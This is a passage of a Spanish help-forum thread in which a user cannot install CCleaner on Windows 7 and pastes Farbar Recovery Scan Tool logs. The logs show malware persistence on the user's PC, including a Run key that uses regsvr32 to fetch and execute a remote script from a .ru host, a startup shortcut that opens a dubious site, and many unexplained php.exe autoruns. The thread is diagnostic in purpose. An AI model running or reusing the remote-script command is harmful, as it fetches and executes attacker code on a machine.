Problem with CCleaner

When I run the CCleaner installer, I get this error. I have Windows 7 Ultimate.

Have you tried restarting the PC?

Yes, of course, and it still doesn't work.

Let's try a very simple solution that, who knows, might even work. Just delete the installer and download it again, in case the file is corrupted or something.

The error still persists, even after downloading the installer again.

  • Temporarily disable your antivirus and any other security programs.

  • Download Farbar Recovery Scan Tool to your Desktop (>> this is very important <<), choosing the right version for your computer (32 or 64 bits). ▶ How do I know whether my Windows is 32-bit or 64-bit?

  • Double-click to run Frst.exe. In the Disclaimer window, press Sí (Yes).

  • In the new window that opens, press the Analizar (Scan) button and wait for the scan to finish.

  • Two (2) files (logs) will open, Frst.txt and Addition.txt, which will be saved on your Desktop.

In your next reply, copy and paste the two FRST reports, Frst.txt and Addition.txt.

Note: If the requested report(s) do not fit in a single reply because they exceed the allowed number of characters, you can use two or more replies to paste them in full.

I'm afraid the error persists, and now with the program you recommended I download as well. I'm attaching an image.

Run it in safe mode.

Resultados del Análisis Adicional de Farbar Recovery Scan Tool (x86) Versión: 19-04-2020
Ejecutado por Familia Landaeta (20-04-2020 13:03:47)
Ejecutado desde C:\Users\Familia Landaeta\Downloads
Microsoft Windows 7 Ultimate  Service Pack 1 (X86) (2016-09-12 15:27:10)
Modo de Inicio: Safe Mode (minimal)
==========================================================


==================== Cuentas: =============================

Administrador (S-1-5-21-1692793609-910991690-2205039242-500 - Administrator - Disabled)
Familia Landaeta (S-1-5-21-1692793609-910991690-2205039242-1000 - Administrator - Enabled) => C:\Users\Familia Landaeta
HomeGroupUser$ (S-1-5-21-1692793609-910991690-2205039242-1002 - Limited - Enabled)
Invitado (S-1-5-21-1692793609-910991690-2205039242-501 - Limited - Disabled)

==================== Centro de Seguridad ========================

(Si una entrada es incluida en el fixlist, será eliminada.)

AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Programas instalados ======================

(Solo los programas de adware con indicador "Oculto", pueden ser añadidos al fixlist para hacerlos visibles. Los programas adware deben ser desinstalados manualmente.)

Adobe Acrobat Reader DC - Español (HKLM\...\{AC76BA86-7AD7-1034-7B44-AC0F074E4100}) (Version: 18.011.20063 - Adobe Systems Incorporated)
Akamai NetSession Interface (HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Akamai) (Version:  - Akamai Technologies, Inc)
CCleaner (HKLM\...\CCleaner) (Version: 5.65 - Piriform)
Cheating-Death 4.33.4 (HKLM\...\Cheating-Death) (Version:  - )
Counter-Strike 1.6 (HKLM\...\Counter-Strike 1.6_is1) (Version: Counter-Strike 1.6 No Steam - KingSOFT DVD)
Epson E-Web Print (HKLM\...\{6BF9F374-EC67-4808-A90C-F127DE6D989D}) (Version: 1.23.0000 - SEIKO EPSON CORPORATION)
EPSON L355 Series Printer Uninstall (HKLM\...\EPSON L355 Series) (Version:  - SEIKO EPSON Corporation)
EPSON Scan (HKLM\...\EPSON Scanner) (Version:  - Seiko Epson Corporation)
Epson Software Updater (HKLM\...\{7BAC3F7A-B963-468E-982E-B5608A87408D}) (Version: 4.4.4 - SEIKO EPSON CORPORATION)
FIFA 14 versión 1.1 (HKLM\...\{A119D7FE-EF42-497D-A87A-C27F106E883E}_is1) (Version: 1.1 - )
Google Chrome (HKLM\...\Google Chrome) (Version: 80.0.3987.163 - Google LLC)
Google Toolbar for Internet Explorer (HKLM\...\{18455581-E099-4BA8-BC6B-F34B2F06600C}) (Version: 1.0.0 - Google Inc.) Hidden
Google Toolbar for Internet Explorer (HKLM\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.8231.2252 - Google Inc.)
Google Update Helper (HKLM\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.35.451 - Google LLC) Hidden
Hero Editor V0.96 (C:\Program Files\Hero Editor\) (HKLM\...\ST6UNST #2) (Version:  - )
Hero Editor V0.96 (HKLM\...\ST6UNST #1) (Version:  - )
Java 8 Update 181 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F32180181F0}) (Version: 8.0.1810.13 - Oracle Corporation)
League of Legends (HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Riot Game league_of_legends.live) (Version:  - Riot Games, Inc)
Microsoft .NET Framework 4.5.2 (español) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 3082) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft Office Enterprise 2007 (HKLM\...\ENTERPRISE) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 (HKLM\...\{402ED4A1-8F5B-387A-8688-997ABF58B8F2}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML4 Parser (HKLM\...\{01501EBA-EC35-4F9F-8889-3BE346E5DA13}) (Version: 1.0.0 - Microsoft Game Studios)
TNod User & Password Finder (HKLM\...\TNod) (Version: 1.6.0.0 - Tukero[X]Team)
VLC media player (HKLM\...\VLC media player) (Version: 2.2.1 - VideoLAN)
WinRAR 4.20 (32-bit) (HKLM\...\WinRAR archiver) (Version: 4.20.0 - win.rar GmbH)
X-Mouse Button Control 2.19 (HKLM\...\X-Mouse Button Control) (Version: 2.19 - Highresolution Enterprises)

==================== Personalizado CLSID (Lista blanca): ==============

(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)

CustomCLSID: HKU\S-1-5-21-1692793609-910991690-2205039242-1000_Classes\CLSID\{305CA226-D286-468e-B848-2B2E8E697B74}\Shell\Open\Command -> C:\Users\Familia Landaeta\AppData\Local\Akamai\ControlPanel.exe (Akamai Technologies, Inc. -> Akamai Technologies, Inc.)
ShellExecuteHooks: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll [2210608 2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2012-06-09] (Alexander Roshal) [Archivo no firmado]
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2010-08-25] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2012-06-09] (Alexander Roshal) [Archivo no firmado]

==================== Codecs (Lista blanca) ====================

==================== Accesos directos & WMI ========================

(Las entradas pueden ser listadas para ser restauradas o eliminadas.)

WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\"::
WMI:subscription\__EventFilter->BVTFilter::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99]
WMI:subscription\CommandLineEventConsumer->BVTConsumer::[CommandLineTemplate => cscript KernCap.vbs][WorkingDirectory => C:\\tools\\kernrate]
ShortcutWithArgument: C:\Users\Familia Landaeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation) -> /c explorer hxxp://www2.savemax.store/

==================== Módulos cargados (Lista blanca) =============

2016-09-21 11:56 - 2016-09-21 11:56 - 000097280 _____ (Microsoft Corporation) [Archivo no firmado] C:\Windows\WinSxS\x86_microsoft.vc80.atl_1fc8b3b9a1e18e3b_8.0.50727.4053_none_d1c738ec43578ea1\ATL80.DLL

==================== Alternate Data Streams (Lista blanca) ========

==================== Modo Seguro (Lista blanca) ==================

(Si una entrada es incluida en el fixlist, será eliminada del registro. El "AlternateShell" será restaurado.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Option => "OptionValue"="1"

==================== Asociación (Lista blanca) =================

==================== Internet Explorer sitios de confianza/restringidos ==========

(Si una entrada es incluida en el fixlist, será eliminada del registro.)

IE restricted site: HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\xnxx.com -> www.xnxx.com

==================== Hosts contenido: =========================

(Si es necesario, la directiva Hosts: puede ser incluida en el fixlist para restablecer Hosts.)

2009-07-13 22:04 - 2016-09-12 13:03 - 000000925 _____ C:\Windows\system32\drivers\etc\hosts
127.0.0.1 genuine.microsoft.com
127.0.0.1 mpa.one.microsoft.com
127.0.0.1 sls.microsoft.com

==================== Otras Áreas ===========================

(Actualmente no existe una corrección automática para esta sección.)

HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files\Common Files\Oracle\Java\javapath;C:\ProgramData\Oracle\Java\javapath;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Familia Landaeta\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: El medio no está conectado a internet.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)

==================== MSCONFIG/TASK MANAGER elementos deshabilitados ==

==================== Reglas de firewall (Lista blanca) ================

(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)


==================== Puntos de Restauración =========================


==================== Dispositivos defectuosos en el Administrador de dispositivos ============

Name: Security Processor Loader Driver
Description: Security Processor Loader Driver
Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1}
Manufacturer: 
Service: spldr
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.


==================== Errores del registro de eventos: ========================

Errores de aplicación:
==================
Error: (04/20/2020 01:02:47 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: No se pudo reactivar el filtro de eventos con la consulta "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" en el espacio de nombres "//./root/CIMV2" por el error 0x80041003. Los eventos no se podrán entregar a través de este filtro hasta que se corrija este problema.

Error: (04/20/2020 01:02:46 PM) (Source: PerfNet) (EventID: 2002) (User: )
Description: No se puede abrir el objeto de rendimiento del servicio del redirector. Los primeros cuatro bytes (DWORD) de la sección de datos contienen el código de estado.

Error: (04/20/2020 01:02:46 PM) (Source: PerfNet) (EventID: 2004) (User: )
Description: No se puede abrir el objeto de rendimiento del servicio del servidor. Los primeros cuatro bytes (DWORD) de la sección de datos contienen el código de estado.

Error: (04/20/2020 12:16:02 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Error al generar el contexto de activación para "C:\Windows\System32\systemcpl.dll".
No se encontró el ensamblado dependiente Microsoft.Windows.Common-Controls,language="&#x2a;",processorArchitecture="&#x2a;",publicKeyToken="436865772d574741",type="win32",version="6.0.0.0".
Use sxstrace.exe para obtener un diagnóstico detallado.

Error: (04/20/2020 09:22:10 AM) (Source: MsiInstaller) (EventID: 1024) (User: NT AUTHORITY)
Description: Producto: Adobe Acrobat Reader DC - Español - la actualización "Adobe Acrobat Reader DC
 (19.010.20098)" no se pudo instalar. Código de error 1603. Windows Installer no puede crear registros para ayudar a solucionar problemas de instalación de paquetes de software. Use el vínculo siguiente para obtener instrucciones sobre la activación de la compatibilidad de registro: http://go.microsoft.com/fwlink/?LinkId=23127

Error: (04/20/2020 09:22:02 AM) (Source: MsiInstaller) (EventID: 11310) (User: NT AUTHORITY)
Description: Producto: Adobe Acrobat Reader DC - Español -- Error 1310. Error al escribir en el archivo C:\Program Files\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\AdobeHunspellPlugin.dll.  Error del sistema 5. Compruebe que dispone de acceso a ese directorio.

Error: (04/20/2020 09:21:24 AM) (Source: MsiInstaller) (EventID: 10005) (User: NT AUTHORITY)
Description: Product: Adobe Refresh Manager -- Error 2203.Database: C:\Windows\Installer\1546f5.ipi. Cannot open database file. System error -2147287035.

Error: (04/20/2020 08:59:28 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: No se pudo reactivar el filtro de eventos con la consulta "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" en el espacio de nombres "//./root/CIMV2" por el error 0x80041003. Los eventos no se podrán entregar a través de este filtro hasta que se corrija este problema.


Errores del sistema:
=============
Error: (04/20/2020 01:02:35 PM) (Source: DCOM) (EventID: 10005) (User: )
Description: Error de DCOM "1068" al intentar iniciar el servicio BITS con argumentos "" para ejecutar el servidor:
{4991D34B-80A1-4291-83B6-3328366B9097}

Error: (04/20/2020 01:02:33 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: El servicio Servicio de lista de redes depende del servicio Reconocimiento de ubicación de red, el cual no pudo iniciarse debido al siguiente error: 
No se puede iniciar el servicio o grupo de dependencia.

Error: (04/20/2020 01:01:54 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: El servicio Servicio de lista de redes depende del servicio Reconocimiento de ubicación de red, el cual no pudo iniciarse debido al siguiente error: 
No se puede iniciar el servicio o grupo de dependencia.

Error: (04/20/2020 01:01:50 PM) (Source: DCOM) (EventID: 10005) (User: )
Description: Error de DCOM "1084" al intentar iniciar el servicio VSS con argumentos "" para ejecutar el servidor:
{E579AB5F-1CC4-44B4-BED9-DE0991FF0623}

Error: (04/20/2020 01:01:28 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: El servicio Servicio de lista de redes depende del servicio Reconocimiento de ubicación de red, el cual no pudo iniciarse debido al siguiente error: 
No se puede iniciar el servicio o grupo de dependencia.

Error: (04/20/2020 01:01:28 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: El servicio Servicio de lista de redes depende del servicio Reconocimiento de ubicación de red, el cual no pudo iniciarse debido al siguiente error: 
No se puede iniciar el servicio o grupo de dependencia.

Error: (04/20/2020 01:01:27 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: El servicio Servicio de lista de redes depende del servicio Reconocimiento de ubicación de red, el cual no pudo iniciarse debido al siguiente error: 
No se puede iniciar el servicio o grupo de dependencia.

Error: (04/20/2020 01:01:27 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: El servicio Servicio de lista de redes depende del servicio Reconocimiento de ubicación de red, el cual no pudo iniciarse debido al siguiente error: 
No se puede iniciar el servicio o grupo de dependencia.


Windows Defender:
===================================
Date: 2020-04-16 10:04:25.437
Description: 
El examen de Windows Defender se detuvo antes de completarse.
Id. de examen:{D89403F0-B93D-475E-9BE2-D2E52245BCDF}
Tipo de examen:AntiSpyware
Parámetros de examen:Examen rápido
Usuario:FamiliaLandaeta\Familia Landaeta

==================== Información de la memoria =========================== 

BIOS: American Megatrends Inc. 6.07 03/21/2011
Placa base: FOXCONN 2A8C
Procesador: Pentium(R) Dual-Core CPU E5800 @ 3.20GHz
Porcentaje de memoria en uso: 69%
RAM física total: 2013.24 MB
RAM física disponible: 613.74 MB
Virtual total: 4026.48 MB
Virtual disponible: 2617.72 MB

==================== Unidades ================================

Drive c: () (Fixed) (Total:148.95 GB) (Free:48.46 GB) NTFS
Drive d: (Audio CD) (CDROM) (Total:0 GB) (Free:0 GB) CDFS

\\?\Volume{459fd2d9-792a-11e6-a962-806e6f6e6963}\ (Reservado para el sistema) (Fixed) (Total:0.1 GB) (Free:0.07 GB) NTFS

==================== MBR & Tabla de particiones ====================

==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 149.1 GB) (Disk ID: F362F362)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=149 GB) - (Type=07 NTFS)

==================== Final  Addition.txt =======================

Resultado del análisis realizado por Farbar Recovery Scan Tool (FRST) (x86) Versión: 19-04-2020
Ejecutado por Familia Landaeta (administrador) sobre FAMILIALANDAETA (Hewlett-Packard HP 500B Microtower) (20-04-2020 13:02:58)
Ejecutado desde C:\Users\Familia Landaeta\Downloads
Perfiles cargados: Familia Landaeta (Perfiles disponibles: Familia Landaeta)
Platform: Microsoft Windows 7 Ultimate  Service Pack 1 (X86) Idioma: Español (España, internacional)
Internet Explorer Versión 11 (Navegador predeterminado: Chrome)
Modo de Inicio: Safe Mode (minimal)
Tutorial para Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Procesos (Lista blanca) =================

(Si una entrada es incluida en el fixlist, el proceso será cerrado. El archivo no será movido.)

(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe

==================== Registro (Lista blanca) ===================

(Si una entrada es incluida en el fixlist, el elemento del registro será restaurado a su valor predeterminado o será eliminado. El archivo no será movido.)

HKLM\...\Run: [GrooveMonitor] => C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe [31016 2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
HKLM\...\Run: [SunJavaUpdateSched] => C:\Program Files\Common Files\Java\Java Update\jusched.exe [601424 2018-07-07] (Oracle America, Inc. -> Oracle Corporation)
HKLM\...\Run: [XMouseButtonControl] => C:\Program Files\Highresolution Enterprises\X-Mouse Button Control\XMouseButtonControl.exe [1346848 2020-02-09] (Open Source Developer, Phillip Gibbons -> Highresolution Enterprises)
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [Akamai NetSession Interface] => C:\Users\Familia Landaeta\AppData\Local\Akamai\netsession_win.exe [4586456 2018-04-17] (Akamai Technologies, Inc. -> Akamai Technologies, Inc.)
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [COM+] => regsvr32 /s /n /u /i:hxxp://server2.39slxu3bw.ru/restore.xml scrobj.dll <==== ATENCIÓN
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [wmwrdqj] => C:\Users\Familia Landaeta\AppData\Local\aoxfre\wyeynesru.exe [141824 2013-10-11] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [php0] => "C:\Users\Familia Landaeta\AppData\Local\php7\php.exe" "C:\Users\Familia Landaeta\AppData\Local\php7\php.php"
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [php1] => "C:\Users\Familia Landaeta\AppData\Local\php7\php.exe" "C:\Users\Familia Landaeta\AppData\Local\php7\php.php"
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [php2] => "C:\Users\Familia Landaeta\AppData\Local\php7\php.exe" "C:\Users\Familia Landaeta\AppData\Local\php7\php.php"
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [php3] => "C:\Users\Familia Landaeta\AppData\Local\php7\php.exe" "C:\Users\Familia Landaeta\AppData\Local\php7\php.php"
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [php4] => "C:\Users\Familia Landaeta\AppData\Local\php7\php.exe" "C:\Users\Familia Landaeta\AppData\Local\php7\php.php"
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [php5] => "C:\Users\Familia Landaeta\AppData\Local\php7\php.exe" "C:\Users\Familia Landaeta\AppData\Local\php7\php.php"
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [php6] => "C:\Users\Familia Landaeta\AppData\Local\php7\php.exe" "C:\Users\Familia Landaeta\AppData\Local\php7\php.php"
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [php7] => "C:\Users\Familia Landaeta\AppData\Local\php7\php.exe" "C:\Users\Familia Landaeta\AppData\Local\php7\php.php"
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [php8] => "C:\Users\Familia Landaeta\AppData\Local\php7\php.exe" "C:\Users\Familia Landaeta\AppData\Local\php7\php.php"
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [php9] => "C:\Users\Familia Landaeta\AppData\Local\php7\php.exe" "C:\Users\Familia Landaeta\AppData\Local\php7\php.php"
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Policies\Explorer: [TaskbarNoNotification] 0
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Policies\Explorer: [HideSCAHealth] 0
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\MountPoints2: {3ce42c48-38d5-11e8-849d-78acc0bd591b} - E:\Setup.exe
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\system32\Mystify.scr [221184 2010-11-20] (Microsoft Windows -> Microsoft Corporation)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files\Google\Chrome\Application\80.0.3987.163\Installer\chrmstp.exe [2020-04-16] (Google LLC -> Google LLC)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{A6EADE66-0000-0000-484E-7E8A45000000}] -> C:\Program Files\Adobe\Acrobat Reader DC\Esl\AiodLite.dll [2018-06-29] (Adobe Systems, Incorporated -> Adobe Systems, Inc.)
Startup: C:\Users\Familia Landaeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Recorte de pantalla e Inicio rápido de OneNote 2007.lnk [2016-10-06]
ShortcutTarget: Recorte de pantalla e Inicio rápido de OneNote 2007.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation -> Microsoft Corporation)
Startup: C:\Users\Familia Landaeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.lnk [2020-04-17]
ShortcutAndArgument: user.lnk -> C:\Windows\System32\cmd.exe => /c explorer hxxp://www2.savemax.store/
Startup: C:\Users\Familia Landaeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xiwlwq.lnk [2020-04-20]
ShortcutTarget: xiwlwq.lnk -> C:\Users\Familia Landaeta\AppData\Local\aoxfre\wyeynesru.exe (Microsoft Windows -> Microsoft Corporation)
BootExecute: autocheck autochk /p \??\F:autocheck autochk * 

==================== Tareas programadas (Lista blanca) ============

(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)

Task: {1F3AC100-06D5-4A79-ACEB-822B7917AF2F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files\Google\Update\GoogleUpdate.exe [154440 2016-09-12] (Google Inc -> Google Inc.)
Task: {268EE322-C696-4C2A-ADED-73EEE65E5919} - System32\Tasks\{33D029CD-E2EB-4BBF-840D-05EE30782182} => C:\Windows\system32\pcalua.exe -a "C:\Users\Familia Landaeta\Documents\Need for Speed Carbon\eauninstall.exe" -d "C:\Users\Familia Landaeta\Documents\Need for Speed Carbon"
Task: {4D752A87-53D3-4FDE-856C-14DA2FE85B25} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1195544 2018-12-16] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
Task: {4F752C9C-8039-4148-94E7-17E0424FB331} - System32\Tasks\{B578D2A0-8F24-4C93-B6F3-0E29139E5C47} => C:\Windows\system32\pcalua.exe -a "C:\Users\Familia Landaeta\Documents\Warcraft III\SetupReg.exe" -d "C:\Users\Familia Landaeta\Documents\Warcraft III"
Task: {65B18C1F-B953-43BD-B364-B3652C2ACD60} - System32\Tasks\{D3E37D6B-A5F9-4EBD-83FD-1DE5065FB775} => C:\Windows\system32\pcalua.exe -a "C:\Users\Familia Landaeta\Documents\Need for Speed Carbon\setup.exe" -d "C:\Users\Familia Landaeta\Documents\Need for Speed Carbon"
Task: {672FBA20-83CF-4151-8163-DE75916F4816} - System32\Tasks\{0C16381D-B4C5-4BFB-B0DE-23B539A738D3} => C:\Users\Familia Landaeta\Documents\counter strike\gta_sa.exe [14386176 2005-07-07] () [Archivo no firmado]
Task: {A6C8DED6-B773-4517-BF76-B6538CD4434C} - System32\Tasks\{FE65F450-8DDE-41FF-8B71-F2B53B14CB22} => C:\Windows\system32\pcalua.exe -a "C:\Users\Familia Landaeta\Desktop\Hitman 1\directx7\dxsetup.exe" -d "C:\Users\Familia Landaeta\Desktop\Hitman 1\directx7"
Task: {AB5506EA-16C8-46C4-9F8E-4B7ED9BA87EA} - System32\Tasks\{568A21DE-A13A-462D-94F2-3A85694880BF} => C:\Windows\system32\pcalua.exe -a C:\Users\FAMILI~1\AppData\Local\Temp\jre-8u161-windows-au.exe -d C:\Windows\system32 -c /installmethod=jau FAMILYUPGRADE=1 <==== ATENCIÓN
Task: {AD5C2F40-438A-4391-8C94-3D407E01EF45} - System32\Tasks\{8E6B5861-4FEB-40B7-AA9A-A940302A2D7E} => C:\Users\Familia Landaeta\Documents\counter strike\gta_sa.exe [14386176 2005-07-07] () [Archivo no firmado]
Task: {CCB34560-3404-4CE5-9DAB-6B46BCB23E2D} - System32\Tasks\{B9641373-3BD3-45E5-A647-78413E924EF2} => C:\Windows\system32\pcalua.exe -a "C:\Users\Familia Landaeta\Documents\HDGHDFG\Eidos Interactive\Pyro\Commandos\MPLAYER\mplaynow.exe" -d "C:\Users\Familia Landaeta\Documents\HDGHDFG\Eidos Interactive\Pyro\Commandos\MPLAYER"
Task: {D6A3E4BB-CBD0-4187-9DCC-3D6F403A10BE} - System32\Tasks\{57FB3682-2104-4F36-8579-4DC3DC47852F} => C:\Windows\system32\pcalua.exe -a "C:\Users\Familia Landaeta\Documents\DownloaderPWCZ\PWCZ_ClienteCompleto_v139\install.exe" -d "C:\Users\Familia Landaeta\Documents\DownloaderPWCZ\PWCZ_ClienteCompleto_v139"
Task: {DAD5D05F-49AA-4561-BCB6-CF36DEC9F03F} - System32\Tasks\{BDC282FB-7E2B-40AD-B6A1-10CE822F66CB} => C:\Windows\system32\pcalua.exe -a "C:\Users\Familia Landaeta\Desktop\Counter-Strike 1.6\unins000.exe" -d "C:\Users\Familia Landaeta\Desktop\Counter-Strike 1.6"
Task: {DC289D95-95B2-4999-9194-C785C844D430} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files\Google\Update\GoogleUpdate.exe [154440 2016-09-12] (Google Inc -> Google Inc.)
Task: {E292CC29-6E23-428B-A8A9-8B353DCB0242} - System32\Tasks\{27B6EE2D-9F7D-4816-8664-F8C35923C977} => C:\Users\Familia Landaeta\Documents\counter strike\gta_sa.exe [14386176 2005-07-07] () [Archivo no firmado]
Task: {EB26897C-3B5C-4277-B0BC-C6842F8F6430} - System32\Tasks\{B695C6D3-B08B-4889-8983-0E883F2B1BD2} => C:\Users\Familia Landaeta\Documents\counter strike\gta_sa.exe [14386176 2005-07-07] () [Archivo no firmado]
Task: {EF2ECF57-BD80-471F-B663-4A9C03A36584} - System32\Tasks\{8C3C6385-93E2-4818-A124-0E0FECD10D73} => C:\Users\Familia Landaeta\Documents\counter strike\gta_sa.exe [14386176 2005-07-07] () [Archivo no firmado]
Task: {FB402BC5-78F6-4A55-937B-E6AEEE83C91C} - System32\Tasks\{71A43D0C-6750-4381-ACFE-5879AE010440} => C:\Users\Familia Landaeta\Documents\counter strike\gta_sa.exe [14386176 2005-07-07] () [Archivo no firmado]

(Si una entrada es incluida en el fixlist, el archivo de tarea (.job) será movido. El archivo que está siendo ejecutado por la tarea no será movido.)

Task: C:\Windows\Tasks\CCleaner Update.job => C:\Program Files\CCleaner\CCUpdate.exe

==================== Internet (Lista blanca) ====================

(Si un elemento es incluido en el fixlist, y éste pertenece al registro, será eliminado o restaurado a su valor predeterminado.)

Hosts: Hay más de una entrada en Hosts. Consulte la sección Hosts de Addition.txt
Tcpip\Parameters: [DhcpNameServer] 37.120.145.234 8.8.8.8
Tcpip\..\Interfaces\{6657F0B0-4452-44DD-8333-C6955B9AC142}: [DhcpNameServer] 192.168.42.129
Tcpip\..\Interfaces\{6CBAB555-2BC9-4266-B7B7-0CBF840B2538}: [DhcpNameServer] 37.120.145.234 8.8.8.8
Tcpip\..\Interfaces\{7C7F7E39-7E43-45F1-9777-5354FEA74937}: [DhcpNameServer] 192.168.42.129

Internet Explorer:
==================
SearchScopes: HKU\S-1-5-21-1692793609-910991690-2205039242-1000 -> {2F3822DF-85FD-483C-B3AA-38ECD8118D39} URL = hxxps://ve.search.yahoo.com/search?p={searchTerms}&intl=ve&fr=yset_ie_syc_oracle&type=orcl_default&partnerexternal-oracle=external-oracle
